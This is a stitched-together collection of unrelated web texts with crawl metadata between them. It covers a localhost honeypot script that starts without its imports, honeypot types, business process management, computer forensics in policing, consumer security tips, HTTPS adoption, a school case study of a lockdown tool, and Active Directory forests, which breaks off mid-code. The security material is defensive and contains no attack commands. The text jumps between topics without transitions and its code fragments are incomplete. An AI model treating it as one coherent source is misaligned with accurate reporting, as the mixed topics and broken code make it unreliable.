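from datetime import datetime, timezone

def run_honeypot(host="127.0.0.1", port=0, banner=b"220 FTP server ready\r\n", log=None):
    """Listen on a fake service port and record every connection attempt."""
    if log is None:
        log = []
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, addr = srv.accept()
            except OSError:      # listener was closed: stop serving
                break
            # Record the probe before answering, so the log is complete
            # by the time the "attacker" receives the banner.
            log.append({"src": addr[0], "port": addr[1],
                        "time": datetime.now(timezone.utc).isoformat()})
            conn.sendall(banner)  # pretend to be a real service
            conn.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv, log

if __name__ == "__main__":
    srv, log = run_honeypot()
    port = srv.getsockname()[1]
    # Simulate an attacker probing the fake service.
    probe = socket.create_connection(("127.0.0.1", port))
    probe.recv(64)
    probe.close()
    srv.close()
    print(log)
```

A real deployment would add containment (no outbound connections from the host) and ship the log to a monitored collector rather than keeping it in memory.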
Types of Honeypot Technologies
Some of the key honeypot technologies are as follows:
- Malware Honeypots: These replicate known attack vectors to attract and identify malware. One example is the Ghost USB honeypot, meant to safeguard machines from malware that spreads through USB drives.
- Spam Honeypots: These simulate open proxies and mail relays, detecting and blocking the large quantities of spam email dispatched by spammers.
- Database Honeypots: These create decoy databases. They are effective against activities like SQL injection that frequently go undetected by firewalls.
- Client Honeypots: These help trace malicious servers that primarily attack clients. They typically run on virtualization technology and implement a containment strategy to limit the risk to the research team.
- Honeynets: A honeynet is a single network comprising multiple honeypots. Its purpose is to tactically track down the motives and methods of the attacker while containing all inbound and outbound traffic.
The Benefits of Honeypot in Network Security
The following are some of the major benefits of a honeypot:
- Ability to break or slow attackers down: While scanning your network, attackers seek out misconfigurations and vulnerable devices. An encounter with the honeypot gives you the chance to investigate and contain the attack in time.
- Unambiguous in approach: A honeypot provides a precise alert and the location of the breach, helping you identify the loophole and the intrusion threat without scanning unnecessary locations and wasting time.
- Easy to install, low-maintenance: Modern honeypots are easy to download and install, and they require little maintenance time and cost.
A strategically prepared honeypot can raise a network's security to a significantly higher level. You cannot depend entirely on honeypots to formulate your threat-detection strategy, but they deliver another trusted layer of security.
So the next time you devise a strategy to integrate honeypots into your network security systems, evaluate the types described above against your needs and add a powerful weapon to your arsenal of ethical deception technology.
Sometimes we tend to confuse managing business processes with business process management, the latter known universally as BPM. While the first is an activity that supports the smooth execution of processes and their control, including their improvement, the second (BPM) is conceived as a comprehensive discipline that defines a model of how companies should organize to achieve their strategic business objectives. I say a model to emphasize that there are other models besides BPM, such as organizing the company around functions, i.e. departments. (Does this mean that departments make less sense in an organization oriented toward BPM? I leave this question open for future articles.)
Managing business processes (or MBP) comprises all those management activities aimed at the proper execution of each process of the company: monitoring, provision of sufficient resources and means, improvement so that subsequent executions of the same process are more efficient, resolution of incidents and problems associated with process execution, reengineering of a process (a one-shot, time-bound project), and so on. Any task focused on making the process run as well as possible can be framed as managing business processes.
Business process management, or BPM, is a discipline and framework upon which a company organizes, operates, produces, and derives income; that is, it governs how the company operates over its lifetime (enterprise architecture). BPM states clearly that the fundamental object of the company's operation is the business process (whether this is truly so is precisely the BPM orientation, and many business experts may disagree), and that the company should be organized around this concept. BPM has a clear objective: to promote and facilitate continuous improvement (ongoing projects). With a business process view, it is easier to identify and make the improvements that enhance the activity of the company.
As a result, BPM is not in opposition to managing business processes, nor vice versa; rather, the second is an activity, or set of activities, that is necessary but not sufficient for BPM. It complements BPM but does not fully define it. We are talking about different scopes: BPM applies globally to the company, while managing business processes applies to specific processes.
Some examples of how the scope of a concept differs depending on whether you view it through BPM or through managing business processes:
| Concept | BPM | Managing business processes |
| --- | --- | --- |
| Organization | Leadership and participant roles in company management and processes. Organization of the company. | Identification of responsible and participant roles in processes. Organization within processes. |
| Processes | Characterization of processes and their relationships (horizontal vs. vertical). Process architecture. | Process inventory. |
| Improvement | Continuous. | One-off: concrete actions for improvement in a single process. |
| Architecture | Business and process architecture. Common threads. | Technical architecture with service orchestration of activities. |
In my opinion, when we want to refer to managing business processes, it would be more appropriate to speak of business process improvement (BPI) rather than BPM, and to reserve the latter term for discussing a framework for enterprise architecture.
Forensic analysis has long been an important tool in policing. From the analysis of gunshot trajectories to the DNA testing of materials at crime scenes, forensics play an increasingly important part in gathering the evidence needed to solve crimes. But with the rise of the computer age, e-crime has become a growing problem throughout the world and with it a new form of forensics has been developed.
E-crime refers to any criminal offence where a computer or other electronic device is used to help commit the crime. A large proportion of e-crime involves the internet. Such crimes include: distributing or downloading extreme hardcore pornography; hate crimes, such as sites designed to incite racial hatred; and ‘hacking’ attempts, where a person attempts to access another person’s computer without permission.
Often, people think that deleting a file, saving over it or even ‘wiping’ the hard drive will remove all traces of evidence from their computer. But increasingly, police are turning to computer forensics experts to help recover this supposedly erased evidence.
Computer forensics involves the analysis of computers (and Mobile Phone Forensics is obviously the analysis of mobile phones) in order to produce legal evidence of a crime or unauthorised action. The sort of evidence extracted from a computer might include earlier versions of files, deleted data or websites visited online. Once extracted, this evidence can be used in a variety of ways, including being presented at employment tribunals to lend weight to action against an employee, or to provide information about the source of a breach in a firm’s internet security.
Computer forensic analysis can also reveal vital clues that can help police solve cases. In 2008, computer forensic analysts helped lead the police to two men who were robbing people at gun point after they responded to motorcycle adverts. The analysis revealed that one computer had been used to place dozens of ads on the listing site Craigslist. The analysts were then able to direct the police to the suspects’ home where they were arrested. This is just one example of how computer forensics has become a vital tool in the fight against crime.
Computer forensic evidence is also often used in a court of law as proof in support of, or against, an accusation of guilt regarding crimes such as fraud, breach of data protection or even murder, where a computer might have been used to carry out research about the crime. In such cases, a computer expert witness would be called to testify as to what evidence had been revealed as a result of the analysis. Such evidence can make or break a case. In the trial of Mohammed Atif Siddique, a Scottish man who was accused of collecting and distributing terrorist related information, computer forensic analysis of his laptop and mobile phone provided vital evidence in securing his eventual conviction.
As more and more people rely on computers, mobile phones and the internet to collect and distribute information, it seems that computer forensics will become an increasingly crucial tool in the fight against crime. | <urn:uuid:6506b56b-f6b1-44ec-b9c9-bf42667d6256> | CC-MAIN-2022-40 | https://www.intaforensics.com/2010/10/15/computer-forensics-as-a-growing-tool-in-the-arsenal-of-policing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00562.warc.gz | en | 0.96509 | 600 | 3.171875 | 3 |
Cybersecurity is, without a doubt, a fascinating field, but the truth of the matter is that few people even bother to put into practice what most consider common-sense advice.
All over the world, people complain about hijacked email accounts, unauthorized purchases, laggy computers, and suspicious software popping up out of the blue.
Granted, it’s unfortunate, but have we really taken all the measures necessary to ensure that our private data remains private? The answer to that question is a big no – the online world is littered with all kinds of dangers, and installing an antivirus just won’t cut it.
So, for your devices to be up-to-speed, security-wise, we have compiled a small list of the very best cybersecurity practices. Enjoy and stay safe out there!
Sensitive browsing should be done from controlled environments
By sensitive browsing, we're, of course, referring to activities that involve monetary transactions of any kind (shopping, accessing a bank account via a specialized app, trading stocks, bidding).
For such tasks, consider a dedicated secure browser (Bitdefender Safepay, for example). It boasts the same features as a regular browser; however, Safepay and similar products add extra encryption protocols that prevent hackers from stealing your information.
Another solid piece of advice would be to use a secured broadband connection or Wi-Fi.
This, of course, excludes sensitive browsing from locations such as coffee stores or shopping malls which offer free Internet service. It would also be a good idea to avoid using a friend’s Wi-Fi. You never know who might be listening.
Passwords should contain more than eight characters
Every sign-up page on the internet advises users to create a strong password. The 'industry standard' is a minimum of eight characters.
Of course, you are free to use only letters and numbers, but for extra safety you should also add symbols and mix upper- and lower-case letters. In our opinion, a good password should contain all four character classes and have at least 12 characters.
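As a sketch of this advice, here is a small generator using Python's secrets module. It guarantees at least one character from each of the four classes; the 12-character floor is the minimum argued above, not a universal standard:

```python
import secrets
import string

def generate_password(length=12):
    """Generate a random password containing all four character classes."""
    if length < 12:
        raise ValueError("use at least 12 characters")
    classes = [string.ascii_lowercase, string.ascii_uppercase,
               string.digits, string.punctuation]
    # Guarantee one character from each class, then fill the rest randomly.
    chars = [secrets.choice(c) for c in classes]
    alphabet = "".join(classes)
    chars += [secrets.choice(alphabet) for _ in range(length - len(chars))]
    # Shuffle so the guaranteed characters are not always at the front.
    secrets.SystemRandom().shuffle(chars)
    return "".join(chars)

print(generate_password(16))
```

Using `secrets` rather than `random` matters here: `random` is a deterministic PRNG not meant for security, while `secrets` draws from the operating system's cryptographic randomness source.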
Don't use the same password for every account; create a new one for each site. If you can't remember them all, the best thing to do is use a password vault such as LastPass.
This software will remember all your passwords, which will be kept in the vault.
Users will be asked to generate a Master Password to protect their stored passwords. Software such as LastPass also comes with useful features such as auto-fill, two-factor authentication via Sesame or YubiKey, fingerprint ID, and desktop support. One last thing: don't use names, surnames, pets' names, dates of birth, or anything of the kind as passwords. They're very easy to crack.
If you are not into cloud password managers, try KeePass. This open-source tool is compatible with most operating systems (both desktop and mobile) and keeps the database and key file locally. I suggest using removable USB sticks for the key file and the database, preferably kept in different places.
Lock your devices and never leave them unattended
Yes, we are aware of the fact that this might seem like a no-brainer, but many people leave their phones or tablets unlocked while at the office or when going to a café.
Of course, the best thing to do would be to keep the device on you at all times. Still, if that’s not possible, don’t forget to lock it before going away. Moreover, you shouldn’t leave the device unattended for long periods.
Always verify credentials when you’re asked to share sensitive information
This is perhaps the oldest and dirtiest trick in the book – posing as a company representative and asking the victim to disclose sensitive information.
In our practice, this is called "shooting the middle man." So the next time someone calls, emails, or messages you about some company-ordered survey, don't be too hasty about sharing information.
Instead, ask what it's about and try to get as many details as possible: name, position, and company. Remember that it's your right to refuse to disclose personal information.
If you have these details, you can try getting in touch with the company to see if this was legit or not. Keep in mind that online service providers will never ask you to reveal your account details.
Perform a thorough scan of flash drives before accessing them
Although the cloud is the fastest way to share information, people still use flash drives and optical storage. If you need to retrieve data from a memory stick or card, it's best to run a malware and antivirus scan before accessing the device.
It doesn’t matter that the stick or card has been given to you by a friend or family member.
They may have become infected without the person’s knowledge. Most antivirus software can automatically scan flash drives or cards when the user connects one to the device.
However, you can also perform an on-demand scan if your antivirus doesn’t come with this feature.
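At its simplest, an on-demand signature scan boils down to hashing every file on the mounted drive and comparing the digests against a known-bad list. Real antivirus engines do far more (heuristics, emulation, behavioural analysis), so treat this only as a toy illustration of the idea; the blocklist passed in would come from a threat-intelligence feed, not be hand-written:

```python
import hashlib
from pathlib import Path

def scan_drive(mount_point, bad_hashes):
    """Return paths of files whose SHA-256 digest appears in a known-bad set."""
    flagged = []
    for path in Path(mount_point).rglob("*"):
        if not path.is_file():
            continue
        digest = hashlib.sha256(path.read_bytes()).hexdigest()
        if digest in bad_hashes:
            flagged.append(str(path))
    return flagged
```

Hash-based matching only catches byte-identical samples, which is exactly why modern malware mutates itself and why real scanners cannot rely on signatures alone.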
Hackers don’t discriminate targets
The worst mistake that you can ever make is to think that you’re far too unimportant to be targeted by hackers. The truth of the matter is that they really don’t care if you’re a regular Joe or a big pharma company – if you have money in your bank account, you automatically become a target.
Stealing your personal info to access and withdraw money from your account is one way to go, but not the only one. Ransomware such as WannaCry encrypts your files with an uncrackable key, and often the only way to retrieve your data, short of restoring a backup, is to pay the requested sum.
Fake friend requests can put your information at risk
Facebook and other social media platforms are great for meeting new people, getting in touch with old friends, or to share amazing videos. Remember, though that you shouldn’t take everything at face value.
A spontaneous friend request may be the beginning of a great friendship or even a budding relationship, but it may also be an attempt to coax you into disclosing sensitive info.
Fake accounts have been used to trick users into sharing stuff like addresses, social security numbers, and even banking details. So, the best approach would be to delete the friend request if you don’t know the person in real life.
On the other hand, there's a chance the account may be legit, and by deleting it you might miss out on something great. If you don't want to block that person, look at their feed.
Fake accounts will have little to no content and, most of it would be generic. Furthermore, if the person attempts to contact you, keep the conversation on a how’s-the-weather-like level; don’t disclose any personal details that may put you at risk.
2-FA all the way!
Sometimes it’s hard to switch between multiple accounts, especially if one or more is protected by two-factor authentication.
However, it’s considered to be one of the most secure methods available to consumers. There are plenty of ways to go about securing your account with 2-FA: some sites ask you to reply to a text message on your phone, others have clickable popups.
Although most sites have in-built 2-FA solutions, we would recommend downloading a third-party mobile app such as Authy, LastPass’s proprietary authenticator, Duo Mobile, or Microsoft Authenticator instead of relying on a single extension.
In a bid to make 2-FA easier and faster, Google has launched the Titan Security Key: a physical device that acts just like a third-party authenticator.
Each time there’s a sign-in attempt, the blue button on the key would flash blue. To confirm your identity, tap the button, and you’re good to go.
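Under the hood, most authenticator apps implement TOTP (RFC 6238): an HMAC of the current 30-second interval, keyed by a shared secret, truncated to a short code. A stdlib-only sketch, checked against the RFC test secret:

```python
import base64
import hashlib
import hmac
import struct
import time

def totp(secret_b32, for_time=None, step=30, digits=6):
    """RFC 6238 time-based one-time password (SHA-1 variant)."""
    key = base64.b32decode(secret_b32, casefold=True)
    counter = int((for_time if for_time is not None else time.time()) // step)
    msg = struct.pack(">Q", counter)           # 8-byte big-endian counter
    digest = hmac.new(key, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                 # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

# RFC 4226/6238 test secret "12345678901234567890", base32-encoded:
SECRET = "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ"
print(totp(SECRET, for_time=59))   # -> 287082 (matches the RFC test vector)
```

Because both sides derive the code from the secret plus the clock, nothing secret travels over the network at login time; an intercepted code is useless 30 seconds later.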
Though it sounds like a dream come true, you should take Google’s gadget with a grain of salt, as there have been reports of firmware errors that may put your Gmail account at risk. Still, it’s an alternative worth exploring.
Back up your data and ensure that your antivirus is up to speed
Always have another copy of your data in case something goes wrong. If you keep work on a physical drive, you might consider backing up to the cloud. You should do the same thing if you prefer cloud over local storage solutions.
On that note, you should also ensure that your antivirus’ database is up to date. This also includes the anti-malware feature.
Though many antivirus programs automatically download and install database updates once they become available, some call for manual intervention. So, back up your data and regularly check your antivirus database. Do the same for all your devices.
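A backup is only useful if the copy is intact. One hedged sketch of the idea in Python: copy the file, then refuse to trust the copy until its checksum matches the original (the function and file names are illustrative, and real backup tools add versioning, scheduling, and off-site replication on top):

```python
import hashlib
import shutil
from pathlib import Path

def sha256(path):
    """Stream a file through SHA-256 so large files don't exhaust memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()

def backup_file(src, dest_dir):
    """Copy src into dest_dir and verify the copy bit-for-bit."""
    dest_dir = Path(dest_dir)
    dest_dir.mkdir(parents=True, exist_ok=True)
    dest = dest_dir / Path(src).name
    shutil.copy2(src, dest)                 # copy2 preserves timestamps
    if sha256(src) != sha256(dest):
        raise IOError(f"backup of {src} is corrupt")
    return dest
```

The same checksum step works in reverse when restoring: verify before overwriting the live copy.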
Not every link is safe
You may have noticed by now that your Gmail spam folder is filled to the brim with all types of suspicious emails. The filter does its job above and beyond the call of duty, but some spammy emails may slip through unnoticed.
If you find something in your mailbox that comes from an unknown source (i.e., promotional emails from retailers you’ve never interacted with), you should avoid clicking them.
In most cases, they’ll lead to pages advertising useless products, but they can also lead to places that download and install spyware and malware in the background.
The same caution applies to flashy links on websites and big "Download" buttons.
Doing a little bit of spring cleaning
Most computer users are hoarders when it comes to old applications. On a daily basis, we don't use more than a handful of apps: Office, a browser, desktop music or video streaming, perhaps a game or two, and a video player.
That’s it – the rest is junk and should be treated like such. So, if you have apps on your PC, tablet, or smartphone that haven’t been used in six months, do yourself a world of good and uninstall them. Apart from gaining some much-needed space, you will also eliminate possible vulnerabilities which hackers can use to access your device.
Check the link when accessing a new website
The best way to ensure that the data you share with a website stays there is to access pages served over Hypertext Transfer Protocol Secure (HTTPS). Encryption in transit ensures that no one can intercept your information or spy on your online activities.
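If you write scripts or tools that handle sensitive URLs, a trivial guard is to refuse anything not explicitly served over HTTPS; for example:

```python
from urllib.parse import urlparse

def is_https(url):
    """True only when the URL is explicitly served over HTTPS."""
    return urlparse(url).scheme == "https"

print(is_https("https://bank.example/login"))   # True
print(is_https("http://bank.example/login"))    # False
```

Browsers make the same check visible via the padlock icon and, increasingly, by flagging plain-HTTP pages as "Not secure".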
Refrain from installing or running PUPs (potentially unwanted applications or programs)
Each time an application is installed on your computer, Windows Notification Center will display a popup asking if you want to run that installation package. In some cases, WNC will say that the program you’re about to run or install is an unwanted app that may put your device at risk.
You should pay more attention to these system messages, although we are aware that most users dismiss them without even bothering to read them.
Keep in mind that the app you're about to install and run may not have been compromised. However, since it's flagged as unwanted, it can, in time, become a gateway for malware and spyware.
So, if it’s not an app crucial to your work or pastime activities, you should refrain from installing it. Gamers, be warned!
Avoid clicking on random ads
Sometimes, hitting an ad that pops up on your screen is inevitable. Mind you that they have engineered to be, well, clickable. Most are legit and will probably redirect you to some online stores.
Yes, it is annoying, but bear in mind that some online service providers use ads to keep the website operational. In some instances, clicking an ad leads to a makeshift page that offers nothing substantial, except for malicious code that's injected into your device.
So, avoid flashy ads, and ensure that your antivirus’ unwanted website tool is up and running. You can also download an ad blocker if you want to get rid of all the on-screen apps. Keep in mind that some sites won’t allow you to surf if they detect ad-blocking software on your computer.
As you can see, most of these security tips are based on common-sense; nothing too pretentious or complicated. What do you think about these cybersecurity tips and tools? Head to the comments section and let us know. | <urn:uuid:a75e5db6-11cd-4469-9a8f-8df2e214ff71> | CC-MAIN-2022-40 | https://cybersecuritymag.com/online-security-tips/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00562.warc.gz | en | 0.93338 | 2,644 | 2.578125 | 3 |
We recently updated our redirection rules in HTTPS Everywhere, a browser extension that automatically redirects you to the HTTPS version of the website you are trying to visit. Now is a good time for us to give a short overview of how important HTTPS is. We'll also talk about a few major HTTPS-related events that happened lately.
When we browse the web, several third parties are able to snoop on the connection between the user and the website, including the user's ISP, law enforcement, the website's ISP, and other parties in between.
These intermediaries are able to obtain, and modify on the fly, most of the information sent through the connection: the website reached, the web page name and content, any username and password, the user's IP address, and more. This obviously poses a lot of problems, which is why HTTPS is now mandatory for more and more websites (public sector, banks, etc.). Using HTTP with SSL/TLS (HTTPS) hides much of this information:
Now, the intermediaries only get access to the website reached and the user's IP address. The web page name, its content, the logins are no longer exposed to whoever snoops between the user and the website. It's also no longer possible to modify this data on the fly.
The security gain is then huge, as it's possible to transmit sensitive data in an authenticated way without being modified. This is possible thanks to a chain of trust established between the user software (a web browser, for instance) and a third-party who authenticated the service (a website, for instance).
This third party is called a Certificate Authority (CA). There are currently many different CAs, and all of them need to strictly follow industry guidelines in order to stay trusted by web browsers, operating systems, and other software.
When a service requests a certificate in order to be authenticated, the Certificate Authority carries out a multi-step process to verify the owner's identity. If the process succeeds, the service is issued its certificate and can be authenticated.
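On the client side, this chain-of-trust verification is what modern TLS stacks enforce by default. In Python's ssl module, for instance, the default context requires the server's certificate to validate against the system's trusted CA store and to match the hostname; connecting is shown in comments only, since it needs network access:

```python
import ssl

ctx = ssl.create_default_context()           # loads the system's trusted CA store
print(ctx.verify_mode == ssl.CERT_REQUIRED)  # True: the chain must validate
print(ctx.check_hostname)                    # True: ...and match the hostname

# An actual connection would look like this (not executed here):
# import socket
# with socket.create_connection(("example.com", 443)) as sock:
#     with ctx.wrap_socket(sock, server_hostname="example.com") as tls:
#         print(tls.getpeercert()["issuer"])   # the CA that vouched for the site
```

Disabling either check (as some scripts do to silence certificate errors) throws away exactly the guarantees described above.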
A widespread adoption

However, despite the huge benefit of using SSL/TLS, anyone who requests a trusted certificate for a specific domain needs to regularly pay an expensive fee, which slows down the adoption rate.
In 2014, a new non-profit Certificate Authority was created by the ISRG with the idea of providing trusted certificates for free to everyone. Adoption was huge: Let's Encrypt publicly launched in 2016 and has already delivered more than 33M certificates for more than 40M domains.
In early 2017, for the first time, more than 50% of all web page requests were served over HTTPS, and the share is still climbing.
This widespread adoption is definitely good news for security. However, the landscape evolves very quickly, with the involved parties trying to fix the remaining problems (and sometimes introducing new ones).
Web browsers pushing harder

In order to push adoption much further, web browsers are also taking active measures.
Recently, Google and Mozilla announced a new feature in their browsers (Chrome and Firefox, respectively): websites served over HTTP will be labeled as non-secure (whereas before HTTP websites used to be the norm and only websites served over HTTPS had a specific label):
Another step is the introduction of Certificate Transparency, support for which will be mandatory for all Certificate Authorities from October 2017, in order to quickly detect wrongly issued certificates and malicious authorities and revoke them as fast as possible.
Last but not least, they are taking strong positions against Certificate Authorities that don't follow the rules and best practices. Google and Mozilla announced their intention to distrust Symantec's "Class 3 Public Primary CA" certificate due to several failures to comply with industry rules and other more recent security problems. This will break the trusted chain and trigger a warning for users visiting a service authenticated with this certificate, and may even block them from visiting the website, depending on their configuration, unless Symantec changes its practices or agrees to comply with Google and Mozilla's requests, which may yet happen.
Security software playing nasty
- On 12 famous and widely used corporate middleboxes tested: | <urn:uuid:28a38035-f2a3-45dd-920f-21005ae6694b> | CC-MAIN-2022-40 | https://www.malwarebytes.com/blog/news/2017/06/https-everywhere | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335286.15/warc/CC-MAIN-20220928212030-20220929002030-00762.warc.gz | en | 0.954708 | 848 | 3.09375 | 3 |
The first school in what is now Garden City was a log cabin built sometime between 1840 and 1845. Today, the Garden City School district has approximately 600 staff and 5,500 students using 1,300 workstations. Half of the workstations are running a Windows environment, while the other half are Macintosh computers. The school district was experiencing problems with students getting into and changing the proxy settings in Internet Explorer. Students were also changing other settings and using Windows Networking to get into other machines in the building that were not secure.
The IT staff at Garden City were already using Deep Freeze to protect their systems. They now deployed WINSelect to restrict the functionality on their systems. Garden City currently has WINSelect installed on almost 100 computers in the district. The IT staff has configured the program to control their web browsers and to control where students can save files. WINSelect also lets administrators disable the right-click mouse option to prevent students from accessing restricted places on the system. | <urn:uuid:33841a81-f1a1-4613-90d5-a1910ab5774d> | CC-MAIN-2022-40 | https://www.faronics.com/document-library/document/faronics-winselect-and-garden-city-public-schools | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335444.58/warc/CC-MAIN-20220930051717-20220930081717-00762.warc.gz | en | 0.972658 | 197 | 2.625 | 3 |
If you’re an IT admin responsible for managing your organization’s critical assets in an enterprise network, Active Directory (AD) should be your number one tool. Whether you’re running a small network or a large one, managing a slew of assets, users, and permissions can be a tedious ordeal. AD facilitates and streamlines this process. A Microsoft technology for managing computers and other devices on an organization’s network, Active Directory enables IT teams to organize users into logical groups and subgroups and to allocate access control for each group with ease.
When properly monitored and managed, Active Directory is an invaluable tool for network administrators, especially as an organization grows larger and begins adding more users and resources to their networks. It’s also enormously helpful in demonstrating industry compliance. In this article, I’ll offer an overview of the important concepts IT teams need to know about Active Directory, then a review of the best tools to keep your AD networks organized. These all have free trials, so I recommend giving them a shot—especially my top picks: SolarWinds® Access Rights Manager and SolarWinds Server & Application Monitor.
Feel free to jump ahead or continue reading:
What Is an Active Directory Forest?
Microsoft designed Active Directory to store and manage information about objects and users on a network. In a way, it can be thought of as a telephone directory for network resources—when an IT team wants to access information about a computer, server, hardware resource, shared file or folder, or group of users, they look it up in AD.
IT teams use Active Directory to arrange, manage, and control network access and permissions, as well as to arrange network objects into logical, hierarchical groups, so admins and managers can better oversee and control their assets. Active Directory is also used to authenticate and authorize users, so only privileged users can obtain access to an organization’s most sensitive data and resources.
Understanding Active Directory Structure
Active Directory is a database management system. To organize its data, it uses a hierarchical structure made up of objects, domains, trees, and forests. Understanding these components of Active Directory structure is vital to effective AD management and monitoring.
In Active Directory, objects can best be understood as physical network entities—AD objects include computers, servers, hardware resources, shared files and folders, and even end users. To make these entities more easily identifiable, Active Directory will assign unique attributes to an object. For example, Active Directory will define a user by name, location, and department. With the added granularity of these attributes, IT teams are better equipped to track and manage important network objects. They can even create AD groups based on certain attributes to better manage a company’s resources or employees.
An Active Directory object can be categorized as either a container object or a leaf object:
- Container objects: Container objects can contain other objects. Examples of a container include folders and printers.
- Leaf objects: Leaf objects, on the other hand, only account for themselves. Examples include users and single files.
Beyond these categories, certain objects are designated as security principal objects, which can be assigned permissions or special authentication rules. IT teams use a unique SID (security identifier) to identify each security principal.
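Every SID has a well-known textual form, S-R-I-S0-S1-..., where R is the revision, I is the identifier authority, and the remaining fields are sub-authorities, the last of which is the relative identifier (RID) for domain principals. As a rough illustration (the example SID below is made up), a minimal parser might look like this:

```python
def parse_sid(sid: str) -> dict:
    """Split a textual SID (S-R-I-S0-S1-...) into its components.

    The revision, identifier authority, and sub-authorities map directly
    onto the dash-separated fields of the string form.
    """
    parts = sid.split("-")
    if parts[0] != "S" or len(parts) < 3:
        raise ValueError(f"not a valid SID string: {sid!r}")
    return {
        "revision": int(parts[1]),
        "identifier_authority": int(parts[2]),
        "sub_authorities": [int(p) for p in parts[3:]],
        # For domain accounts, the final sub-authority is the RID that
        # distinguishes this principal within its domain.
        "rid": int(parts[-1]) if len(parts) > 3 else None,
    }

# A made-up domain-user SID for illustration:
info = parse_sid("S-1-5-21-3623811015-3361044348-30300820-1013")
print(info["rid"])  # 1013
```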
In Active Directory terms, a domain is an area of a network organized by a single authentication database. In other words, an Active Directory domain is essentially a logical grouping of objects on a network. Domains are created so IT teams can establish administrative boundaries between different network entities. There’s no limit to the number of objects you can add into an AD domain, and objects don’t need to be in the same physical location to be grouped together.
Active Directory domains are controlled by a tool called the domain controller. The domain controller acts as a domain authority, meaning it’s responsible for all Active Directory object permissions, authentications, modifications, and edits in a domain. AD domains are usually identified via a Domain Name System (DNS) name, which is typically the same as the company’s public domain name, although sometimes an alternate subdomain name is used.
One of your first considerations when setting up AD will be whether to use a single domain vs. multiple domain Active Directory structure. It’s always advisable to use only the minimum number of domains necessary for your organizational needs. The simplest option is to limit the structure to a single domain, but this isn’t typically possible at the enterprise level.
In large networks, there might be dozens or even hundreds of Active Directory domains. To organize them in a manageable way, domains are put together into groups called Active Directory domain trees.
AD Forest vs. Domain
Enterprise networks with hundreds of users and thousands of network entities might have dozens and dozens of Active Directory trees. In such cases, IT teams will organize AD trees into groups called forests. Active Directory forests are the highest level of security boundary for network objects in the Active Directory tree and forest structure.
Within this Active Directory hierarchy, an AD forest is considered the most important logical container in an Active Directory configuration. This is because it contains all other users, domains, computers, group policies, and any other network objects of importance.
Single vs. Multiple Active Directory Forest
Although Active Directory may contain multiple domains and trees, most configurations house only a single forest. However, in certain situations, it can be advantageous to create multiple Active Directory forests due to a given network’s autonomy or isolation requirements.
In multiple forest ecosystems, information and data exchange can only occur within the confines of a single Active Directory forest. This can be a challenge to manage, so IT admins should know creating more than one forest can make Active Directory monitoring practices significantly more complex.
Generally speaking, it’s considered best practice to run only a single Active Directory forest, but if you need an added layer of security between your Active Directory domains, it’s wise to leverage a multi-forest ecosystem. However, this isn’t an automatic security fix—IT teams still need to manage and enforce permissions for every created Active Directory forest.
Additionally, IT pros might find multiple forests helpful if they’re installing Active Directory management software. With an additional forest, IT teams can leverage an isolated copy of their AD system to test and tweak the configuration of their new software before rolling it out on a live network, minimizing the risk of the software affecting day-to-day operations.
What’s more, multiple forests can be helpful in the case of large company mergers and acquisitions, especially when a company buys another business already using Active Directory on its network. Depending on the nature of the transaction, it can sometimes be easier to create an entirely new forest for the newly bought business, as opposed to migrating every user and resource over into your existing domains and trees.
If the acquired organization plans on operating under its current name even after the acquisition, chances are it won’t want to switch its domain name either. This means it can’t be integrated into your company’s existing domains and trees due to complications with the DNS. In such circumstances, an IT team can attempt to port the trees of the new division over to the existing forest, but this can quickly become complex.
Instead, leave the acquired network alone, and link the two Active Directory forests together by establishing a transitive trust authority. Although this solution has to be carried out manually, it can be effective. A transitive trust authority will extend the accessibility of resources, so the two forests can effectively merge on a logical level. This saves time and IT resources, which will likely already be stretched thin during a merger. IT teams can still manage the two Active Directory forests separately and let the trust link handle any mutual accessibility.
Understanding Active Directory Replication
To understand Active Directory replication, it’s first important to look at how Windows NT environments operated before AD. Windows NT environments were built as single master networks, meaning they used a single primary domain controller. This domain controller was the sole authority responsible for managing the domain’s database.
With this setup, the primary domain controller was responsible for replicating any and all changes made to the backup domain controllers. If the primary domain controller was unavailable or experiencing downtime for some reason, no changes would be made to the domain database, which meant data was at risk of being lost or unaccounted for. This made Windows environments significantly less reliable, since IT teams had to take many manual steps to continually ensure changes could be made to a domain database or else risk losing valuable information.
To mitigate these risks, IT teams needed a way to deploy more than one domain controller. With multiple domain controllers on a single network, performance improves, since the network’s processing load is spread across all domain controllers instead of resting on a single primary domain controller.
The solution came with the introduction of Active Directory, which, unlike Windows NT environments, was designed to be a scalable, distributed, replicated database. This means AD operates with multiple domain controllers. Because every domain controller in an Active Directory ecosystem automatically creates a replica of the information it stores within its own domain, the entire AD system is more reliable than previous systems.
Accordingly, Active Directory replication is best understood as a guarantee that any information or data processed by any of the domain controllers is consistent, updated, and synchronized. Any changes made to a replica on one domain controller will automatically be transferred to replicas on an organization’s other domain controllers. This replication process enables IT admins to modify any Active Directory database from any domain controller, and to have these changes be automatically replicated to all other domain controllers in the same domain or tree.
The question then becomes, what information is replicated in Active Directory? Some actions in AD are replication triggers, meaning when they occur, replication automatically happens. For example, when an object is created, deleted, moved, or changed, it will be replicated.
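Conceptually, the multi-master replication behavior described above can be sketched as a toy model: a change applied at any one domain controller is pushed to its peers until every replica converges. This deliberately ignores real-world details such as update sequence numbers and conflict resolution:

```python
class DomainController:
    def __init__(self, name):
        self.name = name
        self.database = {}   # object name -> attributes
        self.replicas = []   # peer DCs in the same domain

    def apply_change(self, obj, attrs):
        """Apply a change locally, then trigger replication to peers."""
        self.database[obj] = attrs
        for peer in self.replicas:
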